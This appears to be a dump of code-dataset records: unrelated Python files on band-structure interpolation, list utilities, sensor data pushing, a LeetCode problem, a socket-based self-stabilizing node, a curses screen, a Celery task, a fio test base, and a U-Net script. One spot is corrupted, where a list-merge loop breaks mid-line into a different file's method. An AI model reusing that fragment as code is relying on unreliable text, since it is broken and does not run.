(tuple): necessary inputs for calc_analytical_energy or get_energy\n \"\"\"\n analytical_bands = Analytical_bands(coeff_file=coeff_file)\n try:\n engre, latt_points, nwave, nsym, nsymop, symop, br_dir = \\\n analytical_bands.get_engre(iband=ibands)\n except TypeError as e:\n raise ValueError('try reducing max_Ecut to include fewer bands', e)\n\n nstv, vec, vec2 = analytical_bands.get_star_functions(\n latt_points, nsym, symop, nwave, 
br_dir=br_dir)\n out_vec2 = np.zeros((nwave, max(nstv), 3, 3))\n for nw in range(nwave):\n for i in range(nstv[nw]):\n out_vec2[nw, i] = outer(vec2[nw, i], vec2[nw, i])\n return engre, nwave, nsym, nstv, vec, vec2, out_vec2, br_dir\n\n\ndef interpolate_bs(kpts, interp_params, iband, sgn=None, method=\"boltztrap1\",\n scissor=0.0, matrix=None, n_jobs=1, return_mass=True):\n \"\"\"\n Args:\n kpts ([1x3 array]): list of fractional coordinates of k-points\n interp_params (tuple): a tuple or list containing positional\n arguments fed to the interpolation method.\n e.g. for boltztrap1:\n engre, nwave, nsym, stv, vec, vec2, out_vec2, br_dir\n and for boltztrap2:\n (equivalences, lattvec, coeffs)\n iband (int): the band index for which the list of energy, velocity\n and mass is returned. If \"boltztrap2\" method is used, this is the\n actual band index while if \"boltztrap1\" methid is used, this is the\n ith band among the bands that were included in the fit (i.e. when\n get_energy_args is called)\n sgn (float): options are +1 for valence band and -1 for conduction bands\n sgn is basically ignored (doesn't matter) if scissor==0.0\n method (str): the interpolation method. Current options are\n \"boltztrap1\", \"boltztrap2\"\n scissor (float): the amount by which the band gap is modified/scissored\n matrix (3x3 np.ndarray): the direct lattice matrix used to convert\n the velocity (in fractional coordinates) to cartesian in\n boltztrap1 method.\n n_jobs (int): number of processes used in boltztrap1 interpolation\n return_mass (bool): whether to return the effective mass values or not\n\n Returns (tuple of energies, velocities, masses lists/np.ndarray):\n energies ([float]): energy values at kpts for a corresponding iband\n velocities ([3x1 array]): velocity vectors\n masses ([3x3 matrix]): list of effective mass tensors\n \"\"\"\n #TODO: effective mass is still inconsistent between btp1 and btp2 w/o any transformation used since it is not used in Amset ok but has to be checked with the right transformation\n if matrix is None:\n matrix = np.eye(3)\n if not sgn:\n if scissor == 0.0:\n sgn=0.0\n else:\n raise ValueError('To apply scissor \"sgn\" is required: -1 or +1')\n masses = []\n if method==\"boltztrap1\":\n engre, nwave, nsym, nstv, vec, vec2, out_vec2, br_dir = interp_params\n energies = []\n velocities = []\n if n_jobs == 1:\n results = []\n for kpt in kpts:\n result = get_energy(kpt, engre[iband], nwave, nsym,\n nstv, vec, vec2, out_vec2, br_dir,\n return_dde=return_mass)\n results.append(result)\n else:\n inputs = [(kpt, engre[iband], nwave, nsym, nstv, vec, vec2,\n out_vec2, br_dir) for kpt in kpts]\n with Pool(n_jobs if n_jobs != -1 else cpu_count()) as p:\n results = p.starmap(get_energy, inputs)\n for result in results:\n energy = result[0] * Ry_to_eV - sgn * scissor / 2.0\n velocity = abs(np.dot(matrix/np.linalg.norm(matrix), result[1])) / hbar / 0.52917721067 * A_to_m * m_to_cm * Ry_to_eV\n if return_mass:\n effective_m = 1/(result[2]/ 0.52917721067**2*Ry_to_eV) * e / A_to_m**2 * hbar**2 / m_e\n masses.append(effective_m)\n energies.append(energy)\n velocities.append(velocity)\n elif method==\"boltztrap2\":\n if n_jobs != 1:\n warnings.warn('n_jobs={}: Parallel not implemented w/ boltztrap2'\n .format(n_jobs))\n equivalences, lattvec, coeffs = interp_params\n fitted = fite.getBands(np.array(kpts), equivalences, lattvec, coeffs,\n curvature=return_mass)\n energies = fitted[0][iband - 1] * Hartree_to_eV - sgn * scissor / 2.\n velocities = abs(np.matmul(matrix/np.linalg.norm(matrix), 
fitted[1][:, iband - 1, :]).T) * Hartree_to_eV / hbar * A_to_m * m_to_cm / 0.52917721067\n        if return_mass:\n            masses = 1/(fitted[2][:, :, iband - 1, :].T/ 0.52917721067**2*Hartree_to_eV)* e / A_to_m**2 * hbar**2/m_e\n    else:\n        raise AmsetError(\"Unsupported interpolation method: {}\".format(method))\n    if return_mass:\n        return energies, velocities, masses\n    else:\n        return energies, velocities\n\n\ndef get_dos_boltztrap2(params, st, mesh, estep=0.001, vbmidx=None,\n                       width=0.2, scissor=0.0):\n    \"\"\"\n    Calculates the density of states (DOS) based on boltztrap2 interpolation.\n\n    Args:\n        params (list/tuple): parameters required for boltztrap2 interpolation\n        st (pymatgen Structure object): required for generating the irreducible\n            Brillouin zone mesh\n        mesh (a 3x1 list or np.ndarray): the k-grid; e.g. [13, 15, 11]\n        estep (float): small energy step, the smaller better but more expensive\n        vbmidx (int): the index of the valence band maximum assuming the index\n            of the first band is 0\n        width (float): energy bandwidth/smearing parameter.\n        scissor (float): the intended change to the current band gap\n\n    Returns (tuple): in the same order: 1) list of energy values 2) list of\n        densities at those energy values and 3) number of bands considered\n    \"\"\"\n    from BoltzTraP2 import fite\n    (equivalences, lattvec, coeffs) = params\n    # keep the (kpoint, weight) pairs intact until both lists are extracted;\n    # extracting weights after overwriting ir_kpts would index into coordinates\n    ir_kpts_and_weights = SpacegroupAnalyzer(st).get_ir_reciprocal_mesh(mesh)\n    ir_kpts = [k[0] for k in ir_kpts_and_weights]\n    weights = [k[1] for k in ir_kpts_and_weights]\n    w_sum = float(sum(weights))\n    weights = [w / w_sum for w in weights]\n\n    energies, _ = fite.getBands(np.array(ir_kpts), equivalences=equivalences,\n                                lattvec=lattvec, coeffs=coeffs)\n    energies *= Hartree_to_eV  # shape==(bands, nkpoints)\n    nbands = energies.shape[0]\n    if vbmidx is not None:  # explicit None check since vbmidx may legitimately be 0\n        ib_start = max(0, vbmidx-4)\n        ib_end = min(energies.shape[0], vbmidx+1+4)\n        energies[vbmidx + 1:, :] += scissor / 2.\n        energies[:vbmidx + 1, :] -= scissor / 2.\n        energies = energies[ib_start:ib_end, :]\n        nbands = ib_end - ib_start\n    e_min = np.min(energies)\n    e_max = np.max(energies)\n    height = 1.0 / (width * np.sqrt(2 * np.pi))\n    e_points = int(round((e_max - e_min) / estep))\n    e_mesh, step = np.linspace(e_min, e_max, num=e_points, endpoint=True,\n                               retstep=True)\n    e_range = len(e_mesh)\n    dos = np.zeros(e_range)\n\n    for ik, w in enumerate(weights):\n        for b in range(nbands):\n            g = height * np.exp(-((e_mesh - energies[b, ik]) / width) ** 2 / 2.)\n            dos += w * g\n    return e_mesh, dos, nbands\n\n\ndef get_bs_extrema(bs, coeff_file=None, interp_params=None, method=\"boltztrap1\",\n                   line_density=30, min_normdiff=4.0,\n                   Ecut=None, eref=None, return_global=False, n_jobs=-1,\n                   nbelow_vbm=0, nabove_cbm=0, scissor=0.0):\n    \"\"\"\n    Returns a dictionary of p-type (valence) and n-type (conduction) band\n    extrema k-points by looking at the 1st and 2nd derivatives of the bands\n\n    Args:\n        bs (pymatgen BandStructure object): must contain Structure and have\n            the same number of valence electrons and settings as the vasprun.xml\n            from which coeff_file is generated.\n        coeff_file (str): path to the cube file from BoltzTraP run\n        line_density (int): maximum number of k-points between each two\n            consecutive high-symmetry k-points\n        min_normdiff (float): the minimum allowed distance\n            norm(cartesian k in 1/nm) in extrema; this is important to avoid\n            numerical instability errors or finding peaks that are too close\n            to each other for Amset formulation to be relevant.\n        Ecut (float or dict): max energy difference with CBM/VBM 
allowed for\n extrema. Valid examples: 0.25 or {'n': 0.5, 'p': 0.25} , ...\n eref (dict): BandStructure global VBM/CBM used as a global reference\n energy for Ecut. Example: {'n': 6.0, 'p': 5.0}. Ignored if None in\n which case maximum/minimum of the current valence/conduction used\n return_global (bool): in addition to the extrema, return the actual\n CBM (global minimum) and VBM (global maximum) w/ their k-point\n n_jobs (int): number of processors used in boltztrap1 interpolation\n nbelow_vbm (int): # of bands below the last valence band\n nabove_vbm (int): # of bands above the first conduction band\n scissor (float): the amount by which the band gap is altered/scissored.\n\n Returns (dict): {'n': list of extrema fractional coordinates, 'p': same}\n \"\"\"\n lattice_matrix = bs.structure.lattice.reciprocal_lattice.matrix\n def to_cart(k):\n \"\"\"\n convert fractional k-points to cartesian coordinates in (1/nm) units\n \"\"\"\n return np.dot(lattice_matrix, k)*10.\n Ecut = Ecut or 10 * k_B * 300\n if not isinstance(Ecut, dict):\n Ecut = {'n': Ecut, 'p': Ecut}\n if eref is None:\n global_extrema = {'n': {}, 'p': {}}\n else:\n cbmk = np.array(bs.get_cbm()['kpoint'].frac_coords)\n vbmk = np.array(bs.get_vbm()['kpoint'].frac_coords)\n global_extrema = {'n': {'energy': eref['n'], 'kpoint': cbmk},\n 'p': {'energy': eref['p'], 'kpoint': vbmk}}\n final_extrema = {'n': [], 'p': []}\n hsk = HighSymmKpath(bs.structure)\n\n hs_kpoints, _ = hsk.get_kpoints(line_density=line_density)\n hs_kpoints = kpts_to_first_BZ(hs_kpoints)\n vbm_idx, _ = get_bindex_bspin(bs.get_vbm(), is_cbm=False)\n cbm_idx, _ = get_bindex_bspin(bs.get_cbm(), is_cbm=True)\n\n if method == \"boltztrap1\" and interp_params is None:\n interp_params = get_energy_args(coeff_file=coeff_file,\n ibands=[vbm_idx + 1 - nbelow_vbm,\n cbm_idx + 1 + nabove_cbm])\n\n for ip, tp in enumerate([\"p\", \"n\"]): # hence iband == 0 or 1\n if method==\"boltztrap1\":\n iband = ip\n else:\n iband = ip*(cbm_idx+nabove_cbm) + (1-ip)*(vbm_idx-nbelow_vbm) + 1\n band , _, _ = interpolate_bs(hs_kpoints, interp_params, iband=iband,\n method=method, scissor=scissor,\n matrix=bs.structure.lattice.matrix,\n n_jobs=n_jobs, sgn=(-1)**ip)\n global_ext_idx = (1-iband) * np.argmax(band) + iband * np.argmin(band)\n if eref is None:\n global_extrema[tp]['energy'] = band[global_ext_idx]\n global_extrema[tp]['kpoint'] = hs_kpoints[global_ext_idx]\n extrema_idx = detect_peaks(band, mph=None, mpd=1,\n valley=ip==1)\n\n # making sure CBM & VBM are always included regardless of min_normdiff\n extrema_energies = [band[i] for i in extrema_idx]\n sorted_idx = np.argsort(extrema_energies)\n if tp=='p':\n sorted_idx = sorted_idx[::-1]\n extrema_idx = extrema_idx[sorted_idx]\n\n extrema_init = []\n for idx in extrema_idx:\n k_localext = hs_kpoints[idx]\n if abs(band[idx] - global_extrema[tp]['energy']) < Ecut[tp]:\n far_enough = True\n for kp in extrema_init:\n kp = np.array(kp)\n if norm(to_cart(get_closest_k(k_localext,\n np.vstack(\n (bs.get_sym_eq_kpoints(-kp),\n bs.get_sym_eq_kpoints(kp))),\n return_diff=True))) <= min_normdiff:\n far_enough = False\n if far_enough:\n extrema_init.append(k_localext)\n\n # check to see if one of the actual high-symm k-points can be used\n hisymks = list(hsk.kpath['kpoints'].values())\n all_hisymks = []\n for kp in hisymks:\n all_hisymks += list(np.vstack((bs.get_sym_eq_kpoints(-kp),\n bs.get_sym_eq_kpoints(kp))))\n for k_ext_found in extrema_init:\n kp = get_closest_k(k_ext_found, all_hisymks, return_diff=False)\n if norm(to_cart(kp - 
k_ext_found)) < min_normdiff/10.0:\n final_extrema[tp].append(kp)\n else:\n final_extrema[tp].append(k_ext_found)\n # sort the extrema based on their energy (i.e. importance)\n subband, _, _ = interpolate_bs(final_extrema[tp], interp_params, iband=iband,\n method=method, scissor=scissor,\n matrix=bs.structure.lattice.matrix,\n n_jobs=n_jobs, sgn=(-1) ** ip)\n sorted_idx = np.argsort(subband)\n if iband==0:\n sorted_idx = sorted_idx[::-1]\n final_extrema[tp] = [final_extrema[tp][i] for i in sorted_idx]\n\n if return_global:\n return final_extrema, global_extrema\n else:\n return final_extrema\n","sub_path":"amset/utils/band_interpolation.py","file_name":"band_interpolation.py","file_ext":"py","file_size_in_byte":15037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"73806021","text":"def remove_adjacent(lst):\n ans = []\n if len(lst)>0:\n ans.append(lst[0])\n for i in range(1,len(lst)):\n if lst[i] != lst[i-1]:\n ans.append(lst[i])\n\n return ans\n\n\ndef linear_merge(lst1, lst2):\n ans = []\n i = 0\n j = 0;\n while i < len(lst1) and j None:\n # TODO: Use API object/session\n\n # This ensures that any modifications are only local to this function, and do not affect the original (in case\n # it needs to be pushed back into the queue)\n\n timestamp_iso = arrow.get(readout_to_push['t']).isoformat()\n\n readout = deepcopy(readout_to_push)\n if self._dep.get('type') == 'api':\n # Push to API endpoint\n try:\n # Append offset between time that reading was taken and current time\n readout['m']['reading_offset'] = self.__get_reading_offset(\n readout)\n # Transform the device-based readout to the older API format\n readout = convert_to_api_payload(\n readout, self._node.config['readings'])\n logger.debug(f\"PUSH [API]. API-Based Readout: {readout}\")\n except:\n logger.exception(\n 'Could not construct final data payload to push')\n return False\n\n try:\n r = self._session.post(\n f\"https://{self._dep['config']['host']}/api/{self._dep['config']['apiver']}/nodes/{self._node.node_id}/data\",\n json=readout,\n timeout=self._node.config.get(\n 'push_timeout') or self._dep['config'].get('timeout') or 120\n )\n except requests.exceptions.ConnectionError:\n logger.warning(\n f\"Connection error while trying to push data at {timestamp_iso} to API.\")\n return False\n except requests.exceptions.Timeout:\n logger.warning(\n f\"Timeout error while trying to push data at {timestamp_iso} to API.\")\n return False\n except:\n logger.warning(\n f\"Exception while trying to push data at {timestamp_iso} to API.\", exc_info=True)\n return False\n\n if r.status_code != 200:\n logger.warning(\n f\"Error code {r.status_code} while trying to push data point at {timestamp_iso}.\")\n return False\n\n try:\n rtn = json.loads(r.text)\n except:\n logger.warning(\n f\"API response {r.text} could not be parsed as JSON\", exc_info=True)\n rtn = {}\n\n if rtn.get('newconfig'):\n logger.info(\n \"API response indicates new configuration is available. Requesting pull\")\n self._node.events.check_new_config.set()\n\n if rtn.get('newcommand'):\n logger.info(\n \"API response indicates command is available. 
Triggering check\")\n self._node.events.get_command.set()\n\n return True\n\n elif self._dep.get('type') == 'influxdb':\n try:\n # Append offset between time that reading was taken and current time\n readout['m']['reading_offset'] = self.__get_reading_offset(\n readout)\n # Transform the device-based readout to the older API format\n readout = convert_to_api_payload(\n readout, self._node.config['readings'])\n # Set measurement where data should be written\n readout['measurement'] = self._dep['meta']['measurement']\n except:\n logger.exception(\n 'Could not construct final data payload to push')\n return False\n\n r = None\n try:\n r = self._session.write_points([readout])\n except InfluxDBClientError as e:\n logger.error(f\"InfluxDB client error: {e}\")\n except InfluxDBServerError as e:\n logger.error(\n f\"InfluxDB server error for {self._dep.get('client_config')}: {e}\")\n except ConnectionRefusedError as e:\n logger.error(\n f\"InfluxDB server at {self._dep.get('client_config')} not available: {e}\")\n except:\n logger.exception(\n f\"Could not write to InfluxDB at {self._dep.get('client_config')}\")\n\n return r\n\n elif self._dep.get('type') == 'mqtt':\n # Append offset between time that reading was taken and current time\n readout['m']['reading_offset'] = self.__get_reading_offset(readout)\n logger.debug(f\"PUSH [mqtt] Device-based readout: {readout}\")\n return self._session.publish(readout)\n else:\n logger.warning(\n f\"Data endpoint type '{self._dep.get('type')}' not recognized\")\n\n @staticmethod\n def __get_reading_offset(readout: dict) -> int:\n return int(\n arrow.utcnow().float_timestamp -\n readout['t'] - readout['m']['reading_duration']\n )\n","sub_path":"src/data_mgmt/datapusher.py","file_name":"datapusher.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549466881","text":"from typing import List\nclass Solution:\n\tdef divisorGame(self, N: int) -> bool:\n\t\tdp = [False] * (N+1)\n\t\t\n\t\tfor i in range(2, N+1):\n\t\t\tfor j in range(1, i):\n\t\t\t\tif i % j == 0:\n\t\t\t\t\tif dp[i-j] == False:\n\t\t\t\t\t\tdp[i] = True\n\t\t\t\t\t\tbreak\n\n\t\treturn dp[N]\n\nif __name__ == '__main__':\n\tN = 2\n\tres = Solution().divisorGame(N)\n\tprint(res)\n\n\n\n","sub_path":"leetcode-algorithms/1025. Divisor Game/solutio.py","file_name":"solutio.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"288011860","text":"import random\nimport constants\nimport socket\n\nclass Node:\n \n class Neighbour:\n def __init__(self,neighbour_id, neighbour_port, neighbour_level):\n self.id = neighbour_id\n self.port = neighbour_port\n self.level = neighbour_level\n\n def __str__(self):\n return str(self.id) + \" port:\" + str(self.port) + \" level:\" + str(self.level) \n\n def __init__(self, unique_id, port):\n \"\"\"\n @param sock: of type socket\n \"\"\"\n self.id = unique_id\n self.port=port\n self.neighbours = list()\n self.parent = None\n self.level = None\n self.sock = None\n\n # self.sock.listen()\n\n # privilege of -1 indicates node is legitimate. 
\n # 0 will suggest rule 0 can be applied, 1 means rule 1 can be applied\n # 2 means rule 2 can be applied\n self.privilege = -1\n self.total_nodes = constants.TOTAL_NODES\n\n \n\n def __str__(self):\n return str(self.id) + \" port:\" + str(self.port) + \" level:\" + str(self.level) + \" parent:\" + str(self.parent)\n \n\n def print_neighbours(self):\n for node in self.neighbours:\n print(node)\n\n def add_neighbour(self,neighbour_id,neighbour_port,neighbour_level):\n neighbour = self.Neighbour(neighbour_id,neighbour_port,neighbour_level)\n self.neighbours.append(neighbour)\n\n def pick_parent(self):\n if self.parent is None:\n \n self.parent = random.choice(self.neighbours)\n\n elif isinstance(self.parent,str):\n for neigh in self.neighbours:\n if neigh.id == self.parent:\n self.parent = neigh\n break\n\n def check_privilege(self):\n # see neighbours and check if the node has privilege. If yes, send a message to daemon that node has privilege\n if (self.level > self.total_nodes):\n self.level = self.total_nodes\n\n if self.level < self.total_nodes:\n if self.level == self.parent.level + 1:\n # node is legit\n self.privilege = -1\n return\n else:\n if self.parent.level < self.total_nodes:\n # Rule 0\n # parent is correct. fix yourself\n self.privilege = 0\n return\n elif self.parent.level == self.total_nodes:\n # Rule 1\n # Parent is illegitimate. Make level same as parent\n self.privilege = 1\n return \n else:\n # parent.level > total_nodes\n # send parent message to fix self\n self.privilege = -2\n else:\n # self level is total_nodes\n # check if any of the neighbours have legit level. If yes, make them parent\n for n in self.neighbours:\n if n.level < self.total_nodes - 1:\n self.privilege = 3\n break\n\n def notify_central_daemon_of_privilege(self):\n if self.privilege >=0:\n print(f\"[NODE {self.id}]: Notifying CD\")\n try:\n self.sock.close()\n del(self.sock)\n print(f\"[NODE {self.id}]: try socket deleted\")\n\n except:\n pass\n\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((constants.HOST,self.port))\n self.sock.connect((constants.HOST, constants.CENTRAL_DAEMON_PORT))\n privilege_str = f'privilege {self.privilege}'\n self.sock.sendall(privilege_str.encode('ASCII'))\n self.sock.close()\n del(self.sock)\n print(f\"[NODE {self.id}]: CD notified and socket destroyed\")\n\n\n def refresh_privilege(self):\n if self.parent:\n self.check_privilege()\n print(f\"[NODE {self.id}]: during refresh privilege {self.privilege}\")\n self.notify_central_daemon_of_privilege()\n\n print(f\"[NODE {self.id}]: After refresh privilege {self.privilege}\")\n\n def accept_data(self):\n \n conn,addr = self.sock.accept()\n with conn:\n print(f\"[Node {self.id}]:Connected by \", addr)\n \n data = conn.recv(1024)\n self.handle_rcv_data(addr,data)\n\n \n\n def listen(self):\n # print(f\"[Node {self.id}]: Socket status: {self.sock}\")\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.bind((constants.HOST,self.port))\n self.sock.listen()\n print(f\"[Node {self.id}]: listening\")\n while self.sock:\n self.accept_data()\n\n\n def handle_rcv_data(self,addr,data): \n decoded_data = data.decode()\n print(f\"[Node {self.id}]: received data\", decoded_data)\n \n if addr == constants.CENTRAL_DAEMON_PORT:\n # message from central daemon\n if decoded_data == \"privilege\":\n print(f\"[NODE {self.id}]: got privilege\")\n pass\n else:\n # messsage from neighbour\n split_message = decoded_data.split(' ')\n nid = split_message[0]\n nlevel = int(split_message[1])\n for 
n in self.neighbours:\n if n.id == nid:\n n.level = nlevel\n break\n\n self.refresh_privilege()\n \n\n def loop(self):\n print(f\"[Node {self.id}]: In loop\")\n self.listen() ","sub_path":"hons/slef stabalization trial/trial001/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":5578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"272662790","text":"\"\"\"Module that handles displaying of adventure-games story\"\"\"\nimport curses\nimport textwrap\n\n\nclass StoryScreen:\n \"\"\"Story Screen Class, can display parts of the games' story\"\"\"\n\n def __init__(self, screen):\n \"\"\"StoryScreen's init function\"\"\"\n # hold current screen\n self.screen = screen\n\n # Print the Story-Screen to given screen.\n def print(self):\n \"\"\"Prints story-screen\"\"\"\n screen_size = self.screen.getmaxyx()\n story_win = curses.newwin(screen_size[0], screen_size[1], 0, 0)\n story_win.addstr(1, 4, \"Story Name\")\n\n story_image = curses.newwin(\n int(screen_size[0] * 0.50), int(screen_size[1] - 5), 2, 3)\n story_image.border()\n story_win.addstr(\n int(screen_size[0] * 0.92), int(screen_size[1]*0.845),\n \"Weiter (w)\")\n\n text = \"Lorem ipsum dolor sit amet, consetetur \"\n text += \"et accusam et justo duo dolores et\"\n text += \"ea rebum. Stet clita kasd gubergren, no sea takimata\"\n text += \"sanctus est Lorem ipsum dolor sit amet.\"\n text += \"Lorem ipsum dolor sit amet, consetetur sadipscing\"\n text += \"elitr, sed diam nonumy eirmod tempor \"\n text += \"invidunt ut labore et dolore magn\"\n\n story = curses.newwin(int(screen_size[0] * 0.35),\n int(screen_size[1] - 5),\n int(1 + screen_size[0] * 0.55), 3)\n story_size = story.getmaxyx()\n story.border()\n\n story_content = curses.newwin(\n int(story_size[0] * 0.74), int(story_size[1]*0.95),\n int(screen_size[0] * 0.63), 5)\n story_content.addstr(1, 0, textwrap.fill(text, 750))\n self.screen.clear()\n story_win.refresh()\n story_image.refresh()\n story.refresh()\n story_content.refresh()\n","sub_path":"src/story.py","file_name":"story.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"2118273","text":"from celery import shared_task\nfrom subprocess import Popen, PIPE\nfrom challenge.models import Challenge, Release\nfrom django.utils import timezone\nimport requests\nimport datetime\nimport os\n\n\ndef get_release_version(endpoint):\n try:\n r = requests.head(endpoint)\n version_string = r.headers['ETag']\n version = version_string[3:-1]\n return version\n except Exception as e:\n print(e)\n date = timezone.now()\n return f'{date.year}_{date.month:02d}'\n \n@shared_task\ndef load_release(challenge_id):\n challenge = Challenge.objects.get(pk=challenge_id)\n version = get_release_version(challenge.sparql_endpoint)\n y, m = version.split('_')\n y, m = int(y), int(m)\n date = datetime.datetime(year=y, month=m, day=1)\n print('Release version', version)\n latest_release = challenge.get_latest_release()\n if latest_release is not None and latest_release.version == version:\n print('No new release')\n return\n \n release = Release(\n challenge=challenge,\n sparql_endpoint=challenge.sparql_endpoint,\n sparql_query=challenge.sparql_query,\n date=date,\n version=version)\n release.save()\n\n challenge.status = challenge.UPDATING\n challenge.save()\n \n # Load release data\n env = dict(os.environ)\n env['JAVA_OPTS'] = '-Xms2g -Xmx32g'\n p = Popen(['groovy', challenge.script, '-c', 
release.get_dir(),\n '-j', release.get_config_file(),], env=env)\n \n if p.wait() == 0:\n challenge.status = challenge.ACTIVE\n else:\n challenge.status = challenge.UPDATE_FAILED\n challenge.save()\n \n","sub_path":"biochallenge/apps/challenge/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"162381501","text":"#!/usr/bin/python\n'''\n (C) Copyright 2020 Intel Corporation.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n GOVERNMENT LICENSE RIGHTS-OPEN SOURCE SOFTWARE\n The Government's rights to use, modify, reproduce, release, perform, display,\n or disclose this software are subject to the terms of the Apache License as\n provided in Contract No. B609815.\n Any reproduction of computer software, computer software documentation, or\n portions thereof marked with this legend must also reproduce the markings.\n'''\nfrom __future__ import print_function\n\nimport subprocess\n\nfrom ClusterShell.NodeSet import NodeSet\nfrom apricot import TestWithServers, get_log_file\nfrom test_utils_pool import TestPool\nfrom fio_utils import FioCommand\nfrom command_utils import CommandFailure\nfrom dfuse_utils import Dfuse\n\n\nclass FioBase(TestWithServers):\n \"\"\"Base fio class.\n\n :avocado: recursive\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize a FioBase object.\"\"\"\n super(FioBase, self).__init__(*args, **kwargs)\n self.fio_cmd = None\n self.processes = None\n self.manager = None\n self.dfuse = None\n\n def setUp(self):\n \"\"\"Set up each test case.\"\"\"\n # obtain separate logs\n self.update_log_file_names()\n\n # Start the servers and agents\n super(FioBase, self).setUp()\n\n # Get the parameters for Fio\n self.fio_cmd = FioCommand()\n self.fio_cmd.get_params(self)\n self.processes = self.params.get(\"np\", '/run/fio/client_processes/*')\n self.manager = self.params.get(\"manager\", '/run/fio/*', \"MPICH\")\n\n def tearDown(self):\n \"\"\"Tear down each test case.\"\"\"\n try:\n self.dfuse = None\n finally:\n # Stop the servers and agents\n super(FioBase, self).tearDown()\n\n def _create_pool(self):\n \"\"\"Create a pool and execute Fio.\"\"\"\n # Get the pool params\n # pylint: disable=attribute-defined-outside-init\n self.pool = TestPool(self.context, dmg_command=self.get_dmg_command())\n self.pool.get_params(self)\n\n # Create a pool\n self.pool.create()\n\n def _create_cont(self):\n \"\"\"Create a TestContainer object to be used to create container.\"\"\"\n # TO-DO: Enable container using TestContainer object,\n # once DAOS-3355 is resolved.\n # Get Container params\n # self.container = TestContainer(self.pool)\n # self.container.get_params(self)\n\n # create container\n # self.container.create()\n env = Dfuse(self.hostlist_clients, self.tmp).get_default_env()\n # command to create container of posix type\n cmd = env + \"daos cont create --pool={} --svc={} --type=POSIX\".format(\n self.pool.uuid, \":\".join(\n [str(item) for item in 
self.pool.svc_ranks]))\n try:\n container = subprocess.Popen(cmd, stdout=subprocess.PIPE,\n shell=True)\n (output, err) = container.communicate()\n self.log.info(\"Container created with UUID %s\", output.split()[3])\n\n except subprocess.CalledProcessError as err:\n self.fail(\"Container create failed:{}\".format(err))\n\n return output.split()[3]\n\n def _start_dfuse(self):\n \"\"\"Create a DfuseCommand object to start dfuse.\"\"\"\n # Get Dfuse params\n self.dfuse = Dfuse(self.hostlist_clients, self.tmp,\n log_file=get_log_file(self.client_log),\n dfuse_env=self.basepath)\n self.dfuse.get_params(self)\n\n # update dfuse params\n self.dfuse.set_dfuse_params(self.pool)\n self.dfuse.set_dfuse_cont_param(self._create_cont())\n\n try:\n # start dfuse\n self.dfuse.run()\n except CommandFailure as error:\n self.log.error(\"Dfuse command %s failed on hosts %s\",\n str(self.dfuse), str(\n NodeSet.fromlist(self.dfuse.hosts)),\n exc_info=error)\n self.fail(\"Unable to launch Dfuse.\\n\")\n\n def execute_fio(self):\n \"\"\"Runner method for Fio.\"\"\"\n # Create a pool if one does not already exist\n if self.pool is None:\n self._create_pool()\n\n # start dfuse if api is POSIX\n if self.fio_cmd.api.value == \"POSIX\":\n # Connect to the pool, create container and then start dfuse\n # Uncomment below two lines once DAOS-3355 is resolved\n # self.pool.connect()\n # self.create_cont()\n self._start_dfuse()\n self.fio_cmd.update(\n \"global\", \"directory\", self.dfuse.mount_dir.value,\n \"fio --name=global --directory\")\n\n # Run Fio\n self.fio_cmd.hosts = self.hostlist_clients\n self.fio_cmd.run()\n","sub_path":"src/tests/ftest/util/fio_test_base.py","file_name":"fio_test_base.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"5014746","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2019 Intel Corporation\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, version 3.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
If not, see .\n#\n\nfrom argparser import args\nfrom dataloader import DataGenerator\nfrom model import unet\nimport datetime\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport keras as K\n#from tensorflow import keras as K\n\nprint(\"Args = {}\".format(args))\n\nCHANNELS_LAST = True\n\nif CHANNELS_LAST:\n print(\"Data format = channels_last\")\nelse:\n print(\"Data format = channels_first\")\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\" # Get rid of the AVX, SSE warnings\nos.environ[\"OMP_NUM_THREADS\"] = str(args.intraop_threads)\nos.environ[\"KMP_BLOCKTIME\"] = str(args.blocktime)\nos.environ[\"KMP_AFFINITY\"] = \"granularity=thread,compact\"\n\n# os.system(\"lscpu\")\nstart_time = datetime.datetime.now()\nprint(\"Started script on {}\".format(start_time))\n\n#os.system(\"uname -a\")\nprint(\"TensorFlow version: {}\".format(tf.__version__))\nprint(\"Intel MKL-DNN is enabled = {}\".format(tf.pywrap_tensorflow.IsMklEnabled()))\n\nprint(\"Keras API version: {}\".format(K.__version__))\n\n# Optimize CPU threads for TensorFlow\nCONFIG = tf.ConfigProto(\n inter_op_parallelism_threads=args.interop_threads,\n 